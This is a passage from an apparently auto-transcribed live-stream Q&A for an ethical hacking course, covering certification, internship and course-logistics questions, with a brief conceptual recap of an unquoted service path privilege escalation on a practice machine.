antivirus a lot of times. But we are still very much in the beginner level of our course. All right, I'm going to go ahead and come to screen now. Whew. I am tired. My tank's on empty. I've got 18 tickets. Holy crap. It's more of you you guys not knowing how to submit forms. Chat, I don't know what I'm going to do with you. This is Stussy. Great brand. This is a lot of questions. So you're asking about the CEUs. There is some differences between CEUs and CPEs. We will have equivalents when we use our website. So once the first runs around, we'll have the CEUs and what we're accepting for what equivalency, etc. So again, it's not going to be incredibly difficult. As long as you're doing continuing education, we will accept your CEUs. We will have a platform to, once you earn your certification, that you can just go upload your CEUs. So there's not going to be a lot that you have to worry about on that either. Correct. So restarting the service caused the system to interpret the malware wise.exe as the original wise whatever. Correct. Remember, it's going down that path and checking for an executable because it's not quoted. We have write permission to that path, and it was unquoted, and there were spaces in there. So it's like the perfect combination of things to happen. And because it didn't have a literal path to go for, it's checking for an executable every single way down the way until it gets to where it wants to be. My glasses reflection, if you can see, it's just me. I'm looking at you guys. I'm looking at me. What are we going to cover on Friday? We are covering we're covering Black Pearl. It's the last Capstone machine. What is my favorite tattoo that I have, and what's the significance? It is I think it's the Punisher. You guys just want to see my chest, so it's my Punisher tattoo. I don't think there's any like significance as much as just like I really just kind of appreciate from a comic standpoint the Punisher and the vigilante status, and not like, I mean, not having some superhero powers. You know, he's just like a regular guy. He's got a vengeance story. I kind of like his like the background. Where's the dog? All the dogs are outside right now, so we are babysitting two sick kids today, and we're just keeping the dogs outside until I can get out of the stream and go do some dog control. Can you also intercept JavaScript from Burp Suite? I'm not sure if I understand that question fully. Uh You have a question about SkillBridge. Is the internship going to be geared towards people entering cybersecurity, or will you take people who have been in cybersecurity for a while? Congrats on getting approved. Yeah. Um, our standard is that we are right. Okay, so I'll tell you where we're at and where we want to be. We are doing an initial cohort here soon of maybe two people, maybe I think maybe one person. In this instance, like we would ideally want somebody that has some cybersecurity experience. Like some of the people that have applied have a bunch of certifications. They've worked in like the U.S. Cyber Command, so like they have the experience, and that will like really help them hit the ground running in terms of being able to fit into our program. So what we're looking for ideally to start is to get a good candidate that kind of has cyber knowledge. That way we know, because we're still new to this process too, like how we're going to train and develop people. Eventually, what we want to do, I think, is bring on two people every 2 months. Because our program's up to 180 days, we can do a crawl, walk, run process where we bring some two people on that are crawling for the first 60 days. The next 60 days, they're walking and maybe helping train the next cohort that comes in that's crawling, and then go through that process. So, geared up, I would hope that we have eventually 6 people on at any given time from the Skill Bridge program. As of right now, we need to make sure that we do the program correctly and do the, do right by the trainees that we're bringing on and the interns that we're bringing on. So, once we get that process matured, we should have 6 people at any given time. We might bring on SkillBridge people for helping on the development team as well. It might not just be pen testing. We do have a development team, a one-man development team at this point, but so that's something that we would be interested in too, is people that could code and would be interested in working on the development side. And for those of you asking and not tracking, SkillBridge is a program only for U.S. military. So it helps people that are leaving the military transition into civilian life, and gives them basically 6 months or up to 6 months of access to a program like ours that can train them and get them job ready for the field. Is the PEH going to help in the PMPAT? Because you bought it and you're wondering if you should finish it first or after the PMPT. It is the core course of the PMPT, my friend. So you would have a hard time on the PMPT if you don't do the PEH. Very hard time. Is there any disadvantage to getting the non-expiring PMPT over the expiring version? In my opinion, no. However, everywhere you go, especially in the IT field, there are elitists. I can think back of the days where I worked with coworkers that had non-expiring CompTIA certifications like A plus, Security plus, and when they were looking for jobs, some employers were like, "Well, you don't have the most up-to-date expiring certification, so we're not interested." But we're completely outweighing the experience that they had had and everything else that they gathered. The point of the certification, similar to like CompTIA, is to get your foot in the door and be able to use that certification, in the long run to getting you in your career. So, do I think there's a vast difference? I don't, but is there going to be some elitist someday that says he says otherwise? Probably, but it's just my opinion. Would you consult with the organization before running a service path attack? Again, these machines are CTF heavy. Never have I ever run a service path attack against a client organization, and the chances of that ever happening are probably next to zero. Not saying never ever, but they're probably close to zero. So, to answer your question, would I contact them? Yes, depending on the service that's running and if I think it's critical. If it's like this Wise boot up program, then no, I'm probably not going to contact them. If it's some program that I think is mission critical and I'm about to stop that program, then yeah, I would probably contact them. What's TCM Security's vision and mission regarding cybersecurity education? I think our vision and mission is to provide affordable education to those who otherwise couldn't afford it. So I think we're doing a great job of fulfilling that mission. So cheap education, quality education. Somebody once told me, and this was on LinkedIn. I don't remember the guy's name, but it's a famous drug dealer, and he's like, "You remind me of this guy," and I had no idea who he's talking about or why he was talking about. So I went and did research on the guy, and the drug dealer sold better product at a cheaper price than his competitors, and I liked that that reference, I guess, because I do believe we sell better training for a cheaper price than our competition, honestly. Which PMPT do you foresee being more desirable? I think they're going to be the same. Do we update the course on a regular basis? I'd say we've always been pretty regular about updating. I wouldn't say it gets it every quarter, but we constantly update the course. It was Frank Lucas. That is correct. I don't know if that's the guy from American Gangster, but it was Frank Lucas. What games are you playing? I don't really have time for games lately. We played Jackbox as a team on Friday. I thought that was pretty fun. How much Active Directory are you going to cover? I would say the bread and butter of the practical ethical hacking course is Active Directory. So I would imagine at least a few weeks. So I would say 2 to 3 weeks, maybe 4 weeks. It just depends on what the curriculum and lesson plan looks like at the end of it. Uh, how to learn physical pen testing, cloning RFID badges is kind of hardware hacking, and any thought of Flipper Zero. That's like three questions in one. Um, where do you learn physical pen testing? A lot of it's on the job training. You can read books on like social engineering, and you can read how to like manipulate people in certain situations. But a lot of physical pen testing is really just acting like you belong and having a good cover story and backstory, I think. Though some people really get into the whole process. Other than that, cloning RFID badges, yes, that's part of the process. I don't know how much of that I can get into, but the Flipper Zero, I don't have one. I think Joe on our team got one, but I haven't gotten a chance to play with it, so I don't really have an opinion on it. It looks like we're going to stop short today. I'm getting some messages that we have to quit here soon, so we'll take this last question, and then I got another meeting I got to run into, unfortunately. So is this live stream the only complete course for PMPT? Is there any other course on the Academy? The 5 courses is what this live stream is the equivalent to. So the practical ethical hacking, open source intelligence gathering, the Linux and Windows Privesk, and then the external pen test playbook. So it's those 5 courses. You could check out the PMPT website. It details what those 5 courses are as well. So I will see you guys on Friday. I don't know if who we're gonna raid or anything along those lines. I think we'll skip the raid today because I gotta run. So I appreciate it. Thanks, guys. I will see you again on Friday as we cover Black Pearl and get through the Capstone machines. So peace out. See you later.